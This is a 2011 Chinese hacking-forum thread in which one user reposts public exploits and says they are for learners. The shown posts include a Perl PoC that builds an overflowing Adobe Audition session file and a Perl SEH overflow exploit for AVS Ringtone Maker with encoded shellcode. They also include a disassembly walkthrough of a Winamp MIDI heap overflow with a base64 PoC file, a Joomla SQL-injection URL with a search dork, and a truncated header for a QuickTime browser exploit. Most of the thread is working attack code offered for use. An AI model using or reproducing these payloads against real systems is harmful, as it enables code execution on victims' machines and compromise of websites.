论坛: 菜鸟乐园 标题: exploit专题! 复制本贴地址    
作者: DarK-Z [bridex]    论坛用户   登录
源代码!



[此贴被 DarK-Z(bridex) 在 05月19日20时51分 编辑过]

地主 发表时间: 11-05-19 20:11

回复: DarK-Z [bridex]   论坛用户   登录

需要E文好的朋友学习!


[此贴被 DarK-Z(bridex) 在 05月20日11时00分 编辑过]

B1层 发表时间: 11-05-19 20:23

回复: DarK-Z [bridex]   论坛用户   登录
2011 年的呀
Adobe Audition 3.0 (build 7283) Session File Handling
还有源代码

SEBUG-ID:20546 发布时间:2011-05-12 测试方法: [www.sebug.net] 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! #!/usr/bin/perl### Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC### Vendor: Adobe Sy


-

  
SEBUG-ID:20546
发布时间:2011-05-12
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/perl
#
#
# Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC
#
#
# Vendor: Adobe Systems Inc.
# Product web page: http://www.adobe.com/products/audition/
# Affected version: 3.0 (build 7238)
#
# Summary: Recording, mixing, editing, and mastering — Adobe® Audition® 3 software is the
# all-in-one toolset for professional audio production.
#
# Desc: Adobe Audition suffers from a buffer overflow vulnerability when dealing with .SES
# (session) format file. The application failz to sanitize the user input resulting in a
# memory corruption, overwriting several memory registers which can aid the atacker to gain
# the power of executing arbitrary code or denial of service.
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# http://img225.imageshack.us/img225/9871/boferror.jpg
#
#
# Zero Science Lab Advisory ID: ZSL-2011-5012
# Zero Science Lab Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5012.php
#
# Adobe Advisory ID: APSB11-10
# Adobe Advisory URL: http://www.adobe.com/support/security/bulletins/apsb11-10.html
#
# CVE ID: CVE-2011-0614
#
#
# 18.09.2009
#


$data = "\x43\x4F\x4F\x4C\x4E\x45\x53\x53\x50\xF2\x08\x00".
    "\x68\x64\x72\x20\xF0\x03\x00\x00\x22\x56\x00\x00".
    "\xFC\x17\x0A\x00\x00\x00\x00\x00\x20\x00\x01\x00".
    "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00".
    "\x00\x00\xF0\x3F\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x00";


$FNAME = "Assassin.ses";

print "\n\n[*] Creating malicious session file: $FNAME ...\r\n";

open(ses, ">./$FNAME") || die "\n\aCannot open $FNAME: $!";

print ses "$data";
sleep(1);

close (ses);

print "\n[*] Malicious session file successfully crafted!\r\n\n";

// sebug.net [2011-05-13]


B2层 发表时间: 11-05-19 20:27

回复: DarK-Z [bridex]   论坛用户   登录
AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit

B3层 发表时间: 11-05-19 20:34

回复: DarK-Z [bridex]   论坛用户   登录
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0    _                  __          __      __                    1
1  /' \            __  /'__`\        /\ \__  /'__`\                  0
0  /\_, \    ___  /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___          1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0    \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/          1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\          0
0      \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/          1
1                  \ \____/ >> Exploit database separated by exploit  0
0                  \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                  0
1  [+] Support e-mail  : submit[at]1337day.com                        1
0                                                                      0
1              #########################################              1
0              I'm KedAns-Dz member from Inj3ct0r Team                1
1              #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1                      ______                                          0
0                  .-"      "-.                                      1
1                  / KedAns-Dz  \ =-=-=-=-=-=-=-=-=-=-=-|              0
0 Algerian HaCker |              | > Site : 1337day.com |              1
1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0
0                | )(_o/  \o_)( | > ked-h@hotmail.com  |              1
1                |/    /\    \| =-=-=-=-=-=-=-=-=-=-=|              0
0      (@_      (_    ^^    _)  HaCkerS-StreeT-Team                1
1  _    ) \_______\__|IIIIII|__/_______________________              0
0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1
1        )_/        \          /                                      0
0      (@          `--------` &copy; 2011, Inj3ct0r Team                  1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0      AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit                1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
logo();
###
# Title : AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : windows
# Tested on : Windows XP sp3 FR
##
# Drag And Drop This File to edit Window & Start Upload >> Bo0M CalC !
###

my $junk = "\x41" x 4123 ; # Buffer Junk
my $jump = "\xeb\x06\x90\x90"; #  Short Jump
my $eip = pack("V", 0x00401E3C); # EIP
my $seh = pack("V", 0x7C839AC0); # SEH

# windows/exec - 511 bytes ( http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe
my $shellcode = "\xe8\x52\xe6\xff\xff\x90\x90".
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" .
"\x78\x4d\x59\x47\x70\x43\x30\x43\x30\x43\x50\x4e\x69\x49" .
"\x75\x46\x51\x4b\x62\x42\x44\x4e\x6b\x46\x32\x46\x50\x4c" .
"\x4b\x43\x62\x44\x4c\x4c\x4b\x42\x72\x47\x64\x4e\x6b\x51" .
"\x62\x51\x38\x44\x4f\x4e\x57\x43\x7a\x44\x66\x44\x71\x4b" .
"\x4f\x45\x61\x49\x50\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x46" .
"\x62\x44\x6c\x51\x30\x49\x51\x48\x4f\x44\x4d\x47\x71\x49" .
"\x57\x4a\x42\x4c\x30\x42\x72\x50\x57\x4c\x4b\x51\x42\x44" .
"\x50\x4c\x4b\x51\x52\x45\x6c\x46\x61\x4e\x30\x4c\x4b\x47" .
"\x30\x50\x78\x4d\x55\x49\x50\x42\x54\x43\x7a\x43\x31\x4a" .
"\x70\x42\x70\x4c\x4b\x51\x58\x44\x58\x4e\x6b\x50\x58\x45" .
"\x70\x46\x61\x4e\x33\x48\x63\x45\x6c\x50\x49\x4c\x4b\x44" .
"\x74\x4c\x4b\x46\x61\x49\x46\x46\x51\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x48\x4f\x44\x4d\x43\x31\x48\x47\x45" .
"\x68\x49\x70\x42\x55\x49\x64\x43\x33\x51\x6d\x49\x68\x47" .
"\x4b\x43\x4d\x47\x54\x51\x65\x4a\x42\x51\x48\x4c\x4b\x42" .
"\x78\x51\x34\x47\x71\x4b\x63\x50\x66\x4c\x4b\x44\x4c\x50" .
"\x4b\x4c\x4b\x50\x58\x47\x6c\x43\x31\x4a\x73\x4c\x4b\x43" .
"\x34\x4e\x6b\x45\x51\x4a\x70\x4b\x39\x47\x34\x51\x34\x44" .
"\x64\x51\x4b\x43\x6b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b" .
"\x4f\x4b\x50\x51\x48\x43\x6f\x42\x7a\x4e\x6b\x45\x42\x4a" .
"\x4b\x4f\x76\x51\x4d\x50\x6a\x46\x61\x4c\x4d\x4f\x75\x48" .
"\x39\x43\x30\x43\x30\x45\x50\x42\x70\x50\x68\x46\x51\x4e" .
"\x6b\x42\x4f\x4e\x67\x49\x6f\x4a\x75\x4d\x6b\x49\x6e\x44" .
"\x4e\x46\x52\x4a\x4a\x51\x78\x4e\x46\x4a\x35\x4d\x6d\x4f" .
"\x6d\x49\x6f\x4a\x75\x45\x6c\x46\x66\x51\x6c\x44\x4a\x4f" .
"\x70\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x50\x47\x45" .
"\x43\x51\x62\x42\x4f\x43\x5a\x43\x30\x42\x73\x49\x6f\x4e" .
"\x35\x42\x43\x45\x31\x50\x6c\x51\x73\x44\x6e\x43\x55\x51" .
"\x68\x50\x65\x47\x70\x41\x41";
my $exploit = $junk.$jump.$eip.$seh.$shellcode;
open (FILE ,'> KedAns.wav');
print FILE $exploit;

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz + kaMtiEz (exploit-id.com) ...All * TreX (hotturks.org)
# (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
#================================================================================================

我考,图像有点恐!

B4层 发表时间: 11-05-19 20:35

回复: DarK-Z [bridex]   论坛用户   登录
Winamp 5.61 'in_midi' component heap overflow

B5层 发表时间: 11-05-19 20:37

回复: DarK-Z [bridex]   论坛用户   登录
# Exploit Title: Winamp 'in_midi' component heap overflow
# Date: 05/14/2011
# Author: Alexander Gavrun (http://0x1byte.blogspot.com/)
# Software Link: http://www.winamp.com/
# Version: 5.61
# Tested on: Windows 7
 
Vulnerability occur while parsing midi file with special crafted System Exclusive message type (event).
 
System exclusive message type, according with midi specification (http://www.gweep.net/~prefect/eng/reference/protocol/midispec.html), begins with 0xF0 and ends with 0xF7 byte (after the data bytes). Processing of this message type begins in sub_766410F function (dissasembled in_midi.dll of winamp v.5.61).
 
; .....
.text:0766414D loc_766414D:                            ; CODE XREF: sub_766410F+36 j
.text:0766414D                add    ebx, eax
.text:0766414F                lea    esi, [ebx+edi]
.text:07664152                mov    al, [esi]  ; esi points to message begin
.text:07664154                mov    [ebp+var_C], ebx
.text:07664157                cmp    al, 0FFh  ; is first byte equal to 0xFF?
.text:07664159                jnz    loc_7664328
; .....
 
.text:07664328 loc_7664328:                            ; CODE XREF: sub_766410F+4A j
.text:07664328                mov    edx, 0F0h
.text:0766432D                mov    cl, al
.text:0766432F                and    cl, dl
.text:07664331                cmp    cl, dl
.text:07664333                jnz    short loc_7664398 
.text:07664335                cmp    al, dl
.text:07664337                jnz    short loc_766438E ; is first byte equal 0xF0 (is SysEx message type?)?
.text:07664339                mov    eax, [ebp+arg_8]
.text:0766433C                mov    edi, [ebp+var_8]
.text:0766433F                sub    eax, ebx
.text:07664341                push    eax
.text:07664342                mov    ecx, esi
.text:07664344                mov    [ebp+var_10], edi
.text:07664347                call    sub_766D702
.text:0766434C                pop    ecx
.text:0766434D                mov    ecx, [ebp+arg_10]
.text:07664350                add    edi, ecx
.text:07664352                push    edi
.text:07664353                push    eax ; SysEx message size, calculated by sub_766D702
.text:07664354                push    esi
.text:07664355                mov    esi, [ebp+arg_0]
.text:07664358                mov    edi, [esi+30h]
.text:0766435B                mov    [ebp+var_24], eax
.text:0766435E                call    sub_766D894
 
sub_766D702 function search for 0xF7 byte and count a size of SysEx message. Searching starts from 3rd byte and it means that minimal value, which function might return is 3.
 
; .....
.text:0766D702 sub_766D702    proc near   
 
.text:0766D702                push    ebp
.text:0766D703                mov    ebp, esp
.text:0766D705                xor    eax, eax
.text:0766D707                inc    eax    ; eax = 1
.text:0766D708                cmp    [ebp+arg_0], eax ; arg_0 - MTrk chunk size (readed from midi file)
.text:0766D70B                jle    short loc_766D719 ; jump is not taken
.text:0766D70D
.text:0766D70D loc_766D70D:                            ; CODE XREF: sub_766D702+15 j
.text:0766D70D                inc    eax    ; eax = 2
.text:0766D70E                cmp    byte ptr [eax+ecx], 0F7h ; check for 0xF7 byte
.text:0766D712                jz      short loc_766D731
.text:0766D714                cmp    eax, [ebp+arg_0]
.text:0766D717                jl      short loc_766D70D
; .....
.text:0766D731 loc_766D731:                            ; CODE XREF: sub_766D702+10 j
.text:0766D731                inc    eax ; eax = 3 (minimal value that this function might return)
.text:0766D732                pop    ebp
.text:0766D733                retn
; .....
 
In sub_766D894 check the size of early allocated buffer and reallocate it, if necessary. Then to this buffer copy data of the SysEx message with size obtained by subtraction of offset (to data begin) from SysEx message size.
 
.text:0766D894 sub_766D894    proc near              ; CODE XREF: sub_766410F+24F p
.text:0766D894
; .....
.text:0766D8DC loc_766D8DC:                            ; CODE XREF: sub_766D894+29 j
.text:0766D8DC                mov    eax, [edi]
.text:0766D8DE                push    ebx
.text:0766D8DF                mov    ebx, [edi+14h]
.text:0766D8E2                add    ebx, [ebp+arg_4]
.text:0766D8E5                cmp    ebx, eax  ; ebx - SysEx massage size, eax - allocated earlier buffer size
.text:0766D8E7                jb      short loc_766D900  ; jump is taken (to trigger vuln. SysEx message size must be small).
; .....
.text:0766D900 loc_766D900:                            ; CODE XREF: sub_766D894+53 j
.text:0766D900                mov    eax, [edi+14h]
.text:0766D903                mov    ecx, [edi+0Ch]
.text:0766D906                mov    byte ptr [eax+ecx], 0F0h
.text:0766D90A                mov    eax, [ebp+arg_0]
.text:0766D90D                inc    eax
.text:0766D90E                push    0FFFFFFFFh
.text:0766D910                push    eax  ; eax - pointer to start of SysEx message plus one
.text:0766D911                lea    esi, [ebp+var_4]
.text:0766D914                call    sub_766D734
; .....
 
sub_766D734 function calculates offset to data begins by passing all negative values follow by first byte (0xF0).
 
.text:0766D734 sub_766D734    proc near             
; .....
.text:0766D734                xor    eax, eax
.text:0766D736                xor    ecx, ecx
.text:0766D738                push    edi
.text:0766D739
.text:0766D739 loc_766D739:                            ; CODE XREF: sub_766D734+20 j
.text:0766D739                cmp    eax, [esp+4+arg_4] ; arg_4 = 0xFFFFFFFF, eax = 0
.text:0766D73D                jnb    short loc_766D75A ; jump is not taken
.text:0766D73F                mov    edx, [esp+4+arg_0]
.text:0766D743                mov    dl, [eax+edx]  ; store byte to dl
.text:0766D746                movzx  edi, dl
.text:0766D749                and    edi, 7Fh
.text:0766D74C                shl    ecx, 7
.text:0766D74F                inc    eax  ; counter
.text:0766D750                or      ecx, edi
.text:0766D752                test    dl, dl
.text:0766D754                js      short loc_766D739 ; is stored byte less zero?
.text:0766D756                mov    [esi], ecx
.text:0766D758                pop    edi
.text:0766D759                retn
.text:0766D75A ; ---------------------------------------------------------------------------
.text:0766D75A
.text:0766D75A loc_766D75A:                            ; CODE XREF: sub_766D734+9 j
.text:0766D75A                and    dword ptr [esi], 0
.text:0766D75D                pop    edi
.text:0766D75E                retn
.text:0766D75E sub_766D734    endp
 
Then value, obtained as [SysEx message size] - [offset to data begin] - 1, passed as a Size argument to memcpy function.
 
; .....
.text:0766D919                mov    esi, [ebp+arg_4]
.text:0766D91C                sub    esi, eax
.text:0766D91E                lea    ecx, [esi-1]  ; ecx = size - offset - 1
.text:0766D921                push    ecx            ; Size
.text:0766D922                mov    ecx, [ebp+arg_0]
.text:0766D925                mov    [ebp+var_4], eax
.text:0766D928                lea    eax, [eax+ecx+1]
.text:0766D92C                mov    ecx, [edi+0Ch]
.text:0766D92F                push    eax            ; Src
.text:0766D930                mov    eax, [edi+14h]
.text:0766D933                lea    eax, [eax+ecx+1]
.text:0766D937                push    eax            ; Dst
.text:0766D938                call    memcpy
 
Since 0xF7 less than zero, we can construct SysEx message so that offset will be greater (or equal) than size.
For an example, the following sequence
 
0xF0 0xFF 0xF7 0xFF 0xFF ...[data]
size = 3 and offset = 4
ecx = 3 - 4 - 1 = 0xFFFFFFFE - very big positive value. After all heap overflow will be occur.
 
 
POC file (MIME encoded):
poc.mid begin
TVRoZAAAAAYAAQAQAeBNVHJrAAAAIgDw//f///////9VVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVQ==
 
POC Available: http://www.exploit-db.com/sploits/17287.poc.mid


B6层 发表时间: 11-05-19 20:42

回复: DarK-Z [bridex]   论坛用户   登录
又是SQL
Joomla Component com_versioning SQLi Vulnerability

B7层 发表时间: 11-05-19 20:43

回复: DarK-Z [bridex]   论坛用户   登录
SEBUG-ID:20527
SEBUG-Appdir:Joomla
发布时间:2011-05-09
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#[~] Author : the_cyber_nuxbie
#[~] Home  : www.thecybernuxbie.com
#[~] E-mail : staff@thecybernuxbie.com
#[~] Found  : 09 Mei 2011.
#[~] Tested : Windows 7 Ultimate 32bit Bajakan.
#[!] Dork  : inurl:"com_versioning"
______________________________________________________________

[x] X.P.L:
../public_html/index.php?option=com_versioning&sectionid=0&+task=edit&id=[SQLi] <--- Your Skill...!!!

- Shout & Greetz:
All Member & Staff SekuritiOnline    | www.sekuritionline.net
All Member & Staff YogyaFamilyCode  | www.xcode.or.id
All Member & Staff Devilzc0de        | www.devilzc0de.org
All Member & Staff Hacker-Newbie    | www.hacker-newbie.org
All Member & Staff ECHO              | www.echo.or.id
All Member & Staff WhiteCyber        | www.whitecyber.net
All Member & Staff MuslemHacker      | www.muslimhackers.net
All Member & Staff BinusHacker      | www.binushacker.net
All Member & Staff Jasakom          | www.jasakom.com
All Member & Staff YogyaCarderLink.  | www.yogyacarderlink.web.id
All Member & Staff IndonesianDefacer | www.indonesiandefacer.org
All Member & Staff IndonesianCoder  | www.indonesiancoder.com
All Member & Staff MagelangCyber    | www.magelangcyber.web.id
All Member & Staff Jatim-Crew        | www.jatimcrew.org
All Member & Staff Fast-Hacker      | www.fasthacker.org
And all forum / community cyber se-antero indonesia. :-D
,etc...

Sorry masbro...
Aye masih nyubi... :-D
Jangan menghina aye donk... :-(
Bruakakakakakak... :-D

- Mei 09 2011, GMT +09:35 Solo Raya, Indonesia.// sebug.net [2011-05-10]


B8层 发表时间: 11-05-19 20:46

回复: DarK-Z [bridex]   论坛用户   登录
(Firefox & Safari & IE) + QuickTime res://mshtml.dll

B9层 发表时间: 11-05-19 20:48

回复: DarK-Z [bridex]   论坛用户   登录
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0    _                  __          __      __                    1
1  /' \            __  /'__`\        /\ \__  /'__`\                  0
0  /\_, \    ___  /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___          1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0    \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/          1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\          0
0      \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/          1
1                  \ \____/ >> Exploit database separated by exploit  0
0                  \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                  0
1  [+] Support e-mail  : submit[at]1337day.com                        1
0                                                                      0
1              #########################################              1
0              I'm KedAns-Dz member from Inj3ct0r Team                1
1              #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

<!--
###
# Title : (Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits
# Author : KedAns-Dz
